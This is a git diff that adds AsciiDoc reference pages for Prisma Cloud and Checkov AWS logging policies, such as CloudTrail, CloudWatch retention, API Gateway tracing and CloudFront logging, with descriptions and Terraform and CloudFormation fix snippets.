https://github.com/bridgecrewio/checkov/blob/master/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml[CKV2_AWS_30] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "tbd", +} +---- \ No newline at end of file diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/ensure-that-cloudformation-stacks-are-sending-event-notifications-to-an-sns-topic.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/ensure-that-cloudformation-stacks-are-sending-event-notifications-to-an-sns-topic.adoc new file mode 100644 index 000000000..3a4f95f54 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/ensure-that-cloudformation-stacks-are-sending-event-notifications-to-an-sns-topic.adoc @@ -0,0 +1,55 @@ +== AWS CloudFormation stack configured without SNS topic + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8251bd2d-4338-45e0-b0c0-e0ce6a92652a + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CloudformationStackNotificationArns.py[CKV_AWS_124] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Enabling event notifications for your AWS CloudFormation stacks can help you to monitor and track changes to your stacks. +When event notifications are enabled, CloudFormation will send a message to an Amazon Simple Notification Service (SNS) topic each time a stack event occurs. +By doing so, you will improve your visibility and automation processes (if desired). + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_cloudformation_stack +* *Arguments:* notification_arns + + +[source,go] +---- +{ + " resource "aws_cloudformation_stack" "default" { + name = "networking-stack" + ... + + notification_arns = ["arn1", "arn2"] + }", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/ensure-that-detailed-monitoring-is-enabled-for-ec2-instances.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/ensure-that-detailed-monitoring-is-enabled-for-ec2-instances.adoc new file mode 100644 index 000000000..5f178376b --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/ensure-that-detailed-monitoring-is-enabled-for-ec2-instances.adoc @@ -0,0 +1,52 @@ +== AWS EC2 instance detailed monitoring disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| d1472058-15fb-461b-92ee-31a651cfe914 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/EC2DetailedMonitoringEnabled.py[CKV_AWS_126] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Enabling detailed monitoring for Amazon Elastic Compute Cloud (EC2) instances can provide you with additional data and insights about the performance and utilization of your instances. +: Detailed monitoring can provide you with more data about the utilization of your instances, which can be helpful for capacity planning and optimization. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_instance +* *Arguments:* monitoring + + +[source,go] +---- +{ + " resource "aws_instance" "test" { ++ monitoring = true + }", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/ensure-that-enhanced-monitoring-is-enabled-for-amazon-rds-instances.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/ensure-that-enhanced-monitoring-is-enabled-for-amazon-rds-instances.adoc new file mode 100644 index 000000000..49843c6aa --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/ensure-that-enhanced-monitoring-is-enabled-for-amazon-rds-instances.adoc @@ -0,0 +1,55 @@ +== AWS Amazon RDS instances Enhanced Monitoring is disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| c45e811c-c5e1-43c8-b63d-42e3fd034f68 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/RDSEnhancedMonitorEnabled.py[CKV_AWS_118] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan,CloudFormation + +|=== + + + +=== Description + + +Enabling enhanced monitoring for Amazon RDS instances can provide you with additional visibility into the performance and health of your database instances. +With enhanced monitoring, you can retrieve real-time performance metrics for your RDS instances at intervals of 1 second, rather than the standard interval of 60 seconds. +This can be particularly useful for troubleshooting performance issues, identifying trends in resource utilization, and detecting potential issues before they become problems. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_db_instance +* *Arguments:* monitoring_interval + + +[source,go] +---- +{ + "resource "aws_db_instance" "default" { + allocated_storage = 10 + ... ++ monitoring_interval = 5 + }", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/logging-1.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-1.adoc new file mode 100644 index 000000000..c611f5892 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-1.adoc @@ -0,0 +1,144 @@ +== AWS CloudTrail is not enabled with multi trail and not capturing all management events + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 05befc8b-c78a-45e9-98dc-c7fbaef580e7 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CloudtrailMultiRegion.py[CKV_AWS_67] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + +=== Description + + +AWS CloudTrail is a web service that records AWS API calls for your account and delivers log files to you. +The recorded information includes: the identity of the API caller, the time of the API call, the source IP address of the API caller, the request parameters, and the response elements returned by the AWS service. + +CloudTrail provides a history of AWS API calls for an account, including API calls made via the Management Console, SDKs, command line tools, and higher-level AWS services such as CloudFormation. +The AWS API call history produced by CloudTrail enables security analysis, resource change tracking, and compliance auditing. + +AWS CloudTrail provides additional multi-region security: + +* Ensuring that a multi-regions trail exists will detect unexpected activity occurring in otherwise unused regions. +* Ensuring that a multi-regions trail exists will enable Global Service Logging for a trail by default, capturing records of events generated on AWS global services. +* For a multi-regions trail, ensuring that management events are configured for all types of Read/Write operations, results in the recording of management actions performed on all resources in an AWS account. + +//// +=== Fix - Runtime + + +* AWS Console* + + +To enable global (multi-region) CloudTrail logging, follow these steps: + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the https://console.aws.amazon.com/cloudtrail/ [Cloudtrail dashboard]. + +. On the left navigation pane, click * Trails*. + +. Click * Get Started Now*. + +. Click * Add new trail **. + +. Enter a trail name in the * Trail name* box. + +. Set * Apply trail to all regions* option to * Yes*. + +. Enter an S3 bucket name in the * S3 bucket* box. + +. Click * Create*. ++ +If one or more trail already exist, select the target trail to enable global logging, using the following steps: + +. Next to * Apply trail to all regions*, click the edit icon (pencil) and select * Yes*. + +. Click * Save*. + +. Next to * Management Events*, click the edit icon (pencil) and select * All* Read/Write Events. + +. Click * Save*. + + +* CLI Command* + + +To create a multi-region trail, use the following command: +[,bash] +---- +aws cloudtrail create-trail +--name & lt;trail_name> +--bucket-name & lt;s3_bucket_for_cloudtrail> +--is-multi-region-trail aws cloudtrail update-trail +--name & lt;trail_name> +--is-multi-region-trail +---- + +NOTE: Creating a CloudTrail with a CLI command, without providing any overriding options, configures Read/Write Management Events to All. +//// + +=== Fix - Buildtime + + +*CloudFormation* + + +* *Resource:* AWS::CloudTrail::Trail +* *Arguments:* Properties.IsMultiRegionTrail + + +[source,yaml] +---- +{ + "Resources: + MyTrail: + Type: AWS::CloudTrail::Trail + Properties: + ... ++ IsMultiRegionTrail: True", + +} +---- + +*Terraform* + + +* *Resource:* aws_cloudtrail +* *Arguments:* is_multi_region_trail - (Optional) Specifies whether the trail is created in the current region or in all regions. +Defaults to false. +* + + +[source,go] +---- +{ + "resource "aws_cloudtrail" "foobar" { + name = "tf-trail-foobar" + s3_bucket_name = aws_s3_bucket.foo.id + s3_key_prefix = "prefix" + include_global_service_events = false ++ is_multi_region_trail = true +} + +", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/logging-13.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-13.adoc new file mode 100644 index 000000000..2f3634fc3 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-13.adoc @@ -0,0 +1,127 @@ +== AWS CloudWatch Log groups not configured with definite retention days + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2ec595da-49df-4802-87eb-2b3b92786bcf + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/CloudWatchLogGroupRetention.py[CKV_AWS_66] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Enabling CloudWatch retention establishes how long log events are kept in AWS CloudWatch Logs. +Retention settings are assigned to CloudWatch log groups and the retention period assigned to a log group is applied to their log streams. +Any data older than the current retention setting is deleted automatically. +You can change the log retention for each log group at any time. +Log data is stored in CloudWatch Logs indefinitely by default, l. +This may incur high unexpected costs, especially when combined with other forms of logging. +We recommend you configure how long to store log data for in a log group to balance cost with compliance retention requirements. + +//// +=== Fix - Runtime + + +* AWS Console* + + +Procedure: + +. Log in to the AWS Management Console at [https://console.aws.amazon.com/]. + +. Open the https://console.aws.amazon.com/cloudwatch/ [Amazon CloudWatch console]. + +. In the navigation pane, choose* Log Groups**. + +. Find the log group to update. + +. In the * Expire Events After* column for that log group, choose the current retention setting, such as Never Expire. + +. In * Edit Retention*, for Retention, choose a log retention value, then click * Ok*. + + +* CLI Command* + + +Sets the retention of the specified log group. +A retention policy allows you to configure the number of days for which to retain log events in the specified log group. + + +[source,shell] +---- +{ + " put-retention-policy +--log-group-name & lt;value> +--retention-in-days & lt;value> +[--cli-input-json & lt;value>] +[--generate-cli-skeleton & lt;value>] +", +} +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_cloudwatch_log_group +* *Arguments:* retention_in_days - (Optional) Specifies the number of days you want to retain log events in the specified log group. +Possible values are: 1, 3, 5, 7, 14, 30, 60, 90, 120, 150, 180, 365, 400, 545, 731, 1827, 3653, and 0. +If you select 0, the events in the log group are always retained and never expire. + + +[source,go] +---- +{ + "resource "aws_cloudwatch_log_group" "example" { + ... + name = "example" ++ retention_in_days = 90 +}", + + +} +---- + + +*CloudFormation* + + +* *Resource:* aws_cloudwatch_log_group +* *Arguments:* Properties.RetentionInDays - (Optional) Specifies the number of days you want to retain log events in the specified log group. +Possible values are: 1, 3, 5, 7, 14, 30, 60, 90, 120, 150, 180, 365, 400, 545, 731, 1827, 3653, and 0. +If you select 0, the events in the log group are always retained and never expire. + + +[source,yaml] +---- +{ + "Resources: + logGroup: + Type: AWS::Logs::LogGroup + Properties: + ... ++ RetentionInDays: 90", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/logging-15.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-15.adoc new file mode 100644 index 000000000..44257a8a0 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-15.adoc @@ -0,0 +1,121 @@ +== API Gateway does not have X-Ray tracing enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 00eb12be-f74f-4c18-b80b-4720bbfc5f69 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/APIGatewayXray.py[CKV_AWS_73] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +When an API Gateway stage has the active tracing feature enabled, Amazon API Gateway service automatically samples API invocation requests based on the sampling algorithm specified by AWS X-Ray. +With tracing enabled X-Ray can provide an end-to-end view of an entire HTTP request. +You can use this to analyze latencies in APIs and their backend services. + +//// +=== Fix - Runtime + + +* AWS Console* + + + +. Log in to the AWS Management Console at [https://console.aws.amazon.com/]. + +. Open the https://console.aws.amazon.com/apigateway [Amazon API Gateway console]. + +. In the APIs pane, choose the API, and then click * Stages*. + +. In the * Stages **pane, choose the name of the stage. + +. In the * Stage Editor** pane, choose the * Logs/Tracing* tab. + +. To enable active X-Ray tracing, choose * Enable X-Ray Tracing* under X-Ray Tracing. + + +* CLI Command* + + + + +[source,shell] +---- +{ + "aws apigateway create-stage \\ + --rest-api-id {rest-api-id} \\ + --stage-name {stage-name} \\ + --deployment-id {deployment-id} \\ + --region {region} \\ + --tracing-enabled=true +", +} +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_api_gateway_stage +* *Arguments:* xray_tracing_enabled - (Optional) Whether active tracing with X-ray is enabled. +Defaults to false. + + +[source,go] +---- +{ + "resource "aws_api_gateway_stage" "test" { + ... + stage_name = "prod" ++ xray_tracing_enabled = true + ... +} + +", + +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::ApiGateway::Stage +* *Arguments:* Properties.TracingEnabled + + +[source,yaml] +---- +{ + "Resources: + MyStage: + Type: AWS::ApiGateway::Stage + Properties: + ... ++ TracingEnabled: true + ...", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/logging-16.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-16.adoc new file mode 100644 index 000000000..e1ce61c98 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-16.adoc @@ -0,0 +1,93 @@ +== Global Accelerator does not have Flow logs enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 3c2e68e0-bf05-48ac-b3e6-0470bb9fffa0 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/GlobalAcceleratorAcceleratorFlowLogs.py[CKV_AWS_75] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Global Accelerator is a networking service that sends traffic through AWS's global network enabling global access to your web apps. +Flow logs allow capturing information about the IP address traffic going to and from network interfaces in the AWS Global Accelerator. +Flow log data is published to Amazon S3, where it can be retrieved and viewed. +Flow logs enable troubleshooting if specific traffic is not reaching an endpoint, helping you to diagnose overly restrictive security group rules. +It can also be used to monitor the traffic that is reaching endpoints in a VPC and establish if they should be receiving that traffic. + +//// +=== Fix - Runtime + + +* CLI Command* + + + +. Create an S3 bucket for your flow logs. + +. Add an IAM policy for the AWS user who is enabling the flow logs. + +. Run the following commands, with the S3 bucket name and prefix that you want to use for your log files: ++ + +[source,shell] +---- +{ + "aws globalaccelerator update-accelerator-attributes + --accelerator-arn arn:aws:globalaccelerator::012345678901:accelerator/1234abcd-abcd-1234-abcd-1234abcdefgh + --region us-west-2 + --flow-logs-enabled + --flow-logs-s3-bucket s3-bucket-name + --flow-logs-s3-prefix s3-bucket-prefix", +} +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + + +* *Resource:* aws_globalaccelerator_accelerator +* *Arguments:* flow_logs_enabled - (Optional) Indicates whether flow logs are enabled. + + +[source,go] +---- +{ + "resource "aws_globalaccelerator_accelerator" "example" { + name = "Example" + ip_address_type = "IPV4" + enabled = true + + attributes { ++ flow_logs_enabled = true ++ flow_logs_s3_bucket = "example-bucket" ++ flow_logs_s3_prefix = "flow-logs/" + } + +}", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/logging-17.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-17.adoc new file mode 100644 index 000000000..1c6f2ee6c --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-17.adoc @@ -0,0 +1,117 @@ +== API Gateway does not have access logging enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| ee1d5c78-3a80-4fa3-b3c7-01eece8e7b63 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/APIGatewayAccessLogging.py[CKV_AWS_76] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Enabling the custom access logging option in API Gateway allows delivery of custom logs to CloudWatch Logs, which can be analyzed using CloudWatch Logs Insights. +Using custom domain names in Amazon API Gateway allows insights into requests sent to each custom domain name. +If there is more than one custom domain name mapped to a single API, understanding the quantity and type of requests by domain name may help understand request patterns. + +//// +=== Fix - Runtime + + +* AWS Console* + + +Procedure: + +. Log in to the AWS Management Console at [https://console.aws.amazon.com/]. + +. Open the https://console.aws.amazon.com/apigateway/ [Amazon API Gateway console]. + +. Find the Stage Editor for your API. + +. On the * Stage Editor* pane, choose the * Logs/Tracing* tab. + +. On the Logs/Tracing tab, under CloudWatch Settings, do the following to enable execution logging. + +. Select the * Enable CloudWatch Logs* check box. + +. For Log level, choose * INFO **to generate execution logs for all requests. ++ +Or, choose * ERROR **to generate execution logs only for requests to your API that result in an error. + +. Select the Log full requests/responses data check box for a REST API. ++ +Or, select the Log full message data check box for a WebSocket API. + +. Under * Custom Access Logging*, select the Enable Access Logging check box. + +. For * Access Log Destination ARN*, enter the ARN of a CloudWatch log group or an Amazon Kinesis Data Firehose stream. + +. Enter a Log Format. ++ +For guidance, you can choose CLF, JSON, XML, or CSV to see an example in that format. + +. Click * Save Changes*. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_api_gateway_stage +* *Arguments:* access_log_settings - (Optional) Enables access logs for the API stage. + + +[source,go] +---- +resource "aws_api_gateway_stage" "test" { + ... + stage_name = "prod" ++ access_log_settings { ++ destination_arn = "${aws_cloudwatch_log_group.example.arn}" ++ format = "..." ++ } + ... +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::ApiGateway::Stage +* *Arguments:* Properties.AccessLogSettings.DestinationArn + + +[source,yaml] +---- +Resources: + MyStage: + Type: AWS::ApiGateway::Stage + Properties: + ... + AccessLogSetting: + DestinationArn: 'arn:aws:logs:us-east-1:123456789:log-group:example-log-group' + Format: "..." + ... +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/logging-18.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-18.adoc new file mode 100644 index 000000000..76c2a8e26 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-18.adoc @@ -0,0 +1,159 @@ +== Amazon MSK cluster logging is not enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 24e0785e-0e5e-43db-95d3-3744d810d98b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/MSKClusterLogging.py[CKV_AWS_80] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Amazon MSK enables you to build and run applications that use Apache Kafka to process streaming data. +It also provides a control-plane for advanced operations, for example, creating, updating, and deleting clusters. +Consistent cluster logging helps you determine if a request was made with root or AWS Identity and Access Management (IAM) user credentials and whether the request was made with temporary security credentials for a role or federated user. + +//// +=== Fix - Runtime + + +* AWS Console* + + +* New Cluster*: + +. Log in to the AWS Management Console at [https://console.aws.amazon.com/]. + +. Open the https://console.aws.amazon.com/msk/ [Amazon MSK console]. + +. Go to * Broker Log Delivery* in the * Monitoring **section. + +. Specify the destinations to which you want Amazon MSK to deliver your broker logs. ++ +* Existing Cluster*: + +. In the https://console.aws.amazon.com/msk/ [Amazon MSK console] choose the cluster from your list of clusters. + +. Go to the *Details **tab. ++ +Scroll down to the * Monitoring * section and click * Edit*. + +. Specify the destinations to which you want Amazon MSK to deliver your broker logs. + + +* CLI Command* + + +When you use the https://docs.aws.amazon.com/cli/latest/reference/kafka/create-cluster.html [create-cluster] or the https://docs.aws.amazon.com/cli/latest/reference/kafka/update-monitoring.html [update-monitoring] commands, you can optionally specify the logging-info parameter and pass to it a JSON structure. +In this JSON, all three destination types are optional. + + +[source,json] +---- +{ + "{ + "BrokerLogs": { + "S3": { + "Bucket": "ExampleBucketName", + "Prefix": "ExamplePrefix", + "Enabled": true + }, + + "Firehose": { + "DeliveryStream": "ExampleDeliveryStreamName", + "Enabled": true + }, + + "CloudWatchLogs": { + "Enabled": true, + "LogGroup": "ExampleLogGroupName" + } + + } +} + +", +} +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_msk_cluster +* *Arguments:* logging_info - (Optional) Configuration block for streaming broker logs to Cloudwatch/S3/Kinesis Firehose. + +See below. + + +[source,go] +---- +{ + "resource "aws_msk_cluster" "example" { + cluster_name = "example" + ... ++ logging_info { ++ broker_logs { ++ cloudwatch_logs { ++ enabled = true ++ log_group = aws_cloudwatch_log_group.test.name + } + +", + +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::MSK::Cluster +* *Argument:* LoggingInfo. +Configure your MSK cluster to send broker logs to different destination types. +This is a container for the configuration details related to broker logs. + + +[source,go] +---- +{ + "{ + "Type" : "AWS::MSK::Cluster", + "Properties" : { + ... ++ "LoggingInfo" : { ++ "BrokerLogs" : { ++ "CloudWatchLogs" : CloudWatchLogs, ++ "Firehose" : Firehose, ++ "S3" : S3 + } + + } + } + +}", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/logging-19.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-19.adoc new file mode 100644 index 000000000..e09f5a837 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-19.adoc @@ -0,0 +1,100 @@ +== AWS DocumentDB logging is not enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 0c7e0ca3-8c29-43a8-831b-b561ffb5d996 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/DocDBLogging.py[CKV_AWS_85] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +The events recorded by the AWS DocumentDB audit logs include: successful and failed authentication attempts, creating indexes or dropping a collection in a database within the DocumentDB cluster. +AWS CloudWatch logs are a service that monitors, stores and accesses your log files from a variety of sources within your AWS account. +When logging is enabled information such as Data Definition Language, authentication, authorization, and user management events are sent to AWS CloudWatch logs. +This information can be used to analyze, monitor and archive your Amazon DocumentDB auditing events for security and compliance requirements. + +//// +=== Fix - Runtime + + +* AWS Console* + + + +. Log in to the AWS Management Console at [https://console.aws.amazon.com/]. + +. Open the https://console.aws.amazon.com/docdb [Amazon DocumentDB]. + +. In the navigation pane, choose * Clusters*. + +. Specify the cluster that you want to modify by choosing the button to the left of the cluster's name. + +. Choose * Actions*, then click * Modify*. + +. In the Modify Cluster: & lt;cluster-name>+++ pane. ++++& lt;/cluster-name> + +. Go to* Log Exports** and enable exporting audit or profiler logs. + + +* CLI Command* + + +Use the modify-db-cluster operation to modify the specified cluster using the AWS CLI. + + +[source,shell] +---- +{ + "aws docdb modify-db-cluster \\ + --db-cluster-identifier sample-cluster \\ + --cloudwatch-logs-export-configuration '{"EnableLogTypes":["audit"]}'", +} +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_docdb_cluster +* *Arguments:* enabled_cloudwatch_logs_exports - (Optional) List of log types to export to cloudwatch. +If omitted, no logs will be exported. +The following log types are supported: audit, profiler. + + +[source,go] +---- +{ + "resource "aws_docdb_cluster" "docdb" { + cluster_identifier = "my-docdb-cluster" + ... ++ enabled_cloudwatch_logs_exports = ["audit", "profiler"] +} + +", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/logging-2.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-2.adoc new file mode 100644 index 000000000..536db0511 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-2.adoc @@ -0,0 +1,131 @@ +== AWS CloudTrail log validation is not enabled in all regions + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 38e3d3cf-b694-46ec-8bd2-8f02194b5040 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CloudtrailLogValidation.py[CKV_AWS_36] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +CloudTrail log file validation creates a digitally signed digest file containing a hash of each log that CloudTrail writes to S3. +These digest files can be used to determine whether a log file was changed, deleted, or unchanged after CloudTrail delivered the log. +It is recommended that file validation be enabled on all CloudTrails. +We recommend enabling log file validation to provide additional integrity checking of CloudTrail logs. + +//// +=== Fix - Runtime + + +* AWS Console* + + +To enable log file validation on a given trail, follow these steps: + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the https://console.aws.amazon.com/iam/ [IAM console]. + +. On the left navigation pane, click * Trails*. + +. Select the target trail. + +. Navigate to the * S3* section, click the edit icon (pencil). + +. Click * Advanced*. + +. In the * Enable log file validation* section, select * Yes*. + +. Click * Save*. + + +* CLI Command* + + +To enable log file validation on an AWS CloudTrail, use the following command: +[,bash] +---- +aws cloudtrail update-trail +--name & lt;trail_name> +--enable-log-file-validation +---- +---- +To start periodic validation of logs using these digests, use the following command: +[,bash] +---- +---- +aws cloudtrail validate-logs +--trail-arn & lt;trail_arn> +--start-time & lt;start_time> +--end-time & lt;end_time> +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_cloudtrail +* *Arguments:* enable_log_file_validation - (Optional) Specifies whether log file integrity validation is enabled. +Defaults to false. + + +[source,go] +---- +---- +{ + "resource "aws_cloudtrail" "trail_1" { + ... + name = "terraform.env-trail-01" ++ enable_log_file_validation = true +} + +", + +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::CloudTrail::Trail +* *Arguments:* Properties.EnableLogFileValidation + + +[source,yaml] +---- +---- +{ + " Resources: + myTrail: + Type: AWS::CloudTrail::Trail + Properties: + ... ++ EnableLogFileValidation: True", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/logging-20.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-20.adoc new file mode 100644 index 000000000..e90d6e48e --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-20.adoc @@ -0,0 +1,150 @@ +== AWS CloudFront distribution with access logging disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 4a719209-0c06-4f42-a33e-9f0107a76fa9 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CloudfrontDistributionLogging.py[CKV_AWS_86] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Cloudfront access logs contain detailed information (requested object name, date and time of the access, client IP, access point, error code, etc) about each request made for your web content. +This information can be extremely useful during security audits, or as input data for various analytics/reporting tools. +Pairing with Lambda and WAF logs could help expedite a response process and possibly enable blocking requests coming from IP addresses that generate multiple errors. +These spikes in errors could possibly indicate they were made by attackers trying to find vulnerabilities within your web application. + +//// +=== Fix - Runtime + + +* AWS Cloud Front Console Procedure:* + + + +. Log in to the AWS Management Console at [https://console.aws.amazon.com/]. + +. Open the https://console.aws.amazon.com/cloudfront/home [AMazon CloudFront console]. + +. Select a * CloudFront Distribution* that is missing access logging. + +. From the menu, click * Distribution Settings* to get into the configuration page. + +. From the * General* tab on the top menu, click * Edit*. + +. In * Distribution Settings* tab scroll down and verify the * Logging* feature configuration status. ++ +If Logging is Off then it cannot create log files that contain detailed information about every user request that CloudFront receives. + +. Click * ON* to initiate the Logging feature of CloudFront to log all viewer requests for files in your distribution. + + +* CLI Command* + + + +. Create an S3 bucket to store your access logs. + +. Create a JSON file to enable logging and set an S3 bucket location to configure a destination for logs files. ++ + +[source,json] +---- +{ + " { + "ETag": "ETAGID001", + "DistributionConfig": { + ... + "Logging": { + "Bucket": "cloudfront-logging.s3.amazonaws.com", + "Enabled": true, + }, + + } + } + + } + ", + +} +---- + +. Run update-distribution to update your distribution with your distribution id, the path of the configuration file, and your etag. ++ + +[source,shell] +---- +{ + " aws cloudfront update-distribution + --id ID000000000000 + --distribution-config logging.json + --if-match ETAGID001", + +} +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + + +* *Resource:* aws_cloudfront_distribution +* *Arguments:* logging_config (Optional) - The logging configuration that controls how logs are written to your distribution (maximum one). + + +[source,go] +---- +resource "aws_cloudfront_distribution" "s3_distribution" { + ... + default_root_object = "index.html" ++ logging_config { ++ bucket = "mylogs.s3.amazonaws.com" + ... + } +} +---- + + +*CloudFormation* + + + +* *Resource:* AWS::CloudFront::Distribution +* *Arguments:* Properties.DistributionConfig.Logging/Bucket + + +[source,yaml] +---- +Resources: + MyCloudFrontDistribution: + Type: 'AWS::CloudFront::Distribution' + Properties: + ... + DistributionConfig: + ... ++ Logging: ++ Bucket: myawslogbucket.s3.amazonaws.com +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/logging-5-enable-aws-config-regions.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-5-enable-aws-config-regions.adoc new file mode 100644 index 000000000..be319ed88 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-5-enable-aws-config-regions.adoc @@ -0,0 +1,109 @@ +== AWS config is not enabled in all regions + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 